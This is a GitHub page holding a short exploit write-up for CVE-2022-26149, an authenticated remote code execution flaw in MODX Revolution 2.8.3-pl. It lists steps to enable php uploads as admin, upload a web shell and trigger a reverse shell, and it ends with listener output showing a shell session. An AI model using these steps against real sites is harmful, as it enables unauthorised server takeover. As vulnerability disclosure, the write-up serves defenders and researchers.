Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
0days/Modx/Exploit.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
20 lines (18 sloc)
1.12 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Exploit Title: Authenticated Remote Code Execution in MODX Revolution V2.8.3-pl | |
| # Remote Code Execution in MODX Revolution V2.8.3-pl and earlier allows remote attackers to execute arbitrary code via uploading a php web shell. | |
| # Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718 | |
| # Date: 26th Feb'2022 | |
| # CVE ID: CVE-2022-26149 | |
| # Confirmed on release 2.8.3-pl | |
| # Vendor: https://modx.com/download | |
| ############################################### | |
| #Step1- Login with Admin Credentials | |
| #Step2- Uploading .php files is disabled by default hence we need to abuse the functionality: | |
| Add the php file extension under the "Uploadable File Types" option available in "System Settings" | |
| #Step3- Now Goto Media=>Media Browser and upload the Shell.php | |
| #Step4- Now visit http://IP_Address/Shell.php and get the reverse shell: | |
| listening on [any] 4477 ... | |
| connect to [192.168.56.1] from (UNKNOWN) [192.168.56.130] 58056 | |
| bash: cannot set terminal process group (1445): Inappropriate ioctl for device | |
| bash: no job control in this shell | |
| daemon@debian:/opt/bitnami/modx$ |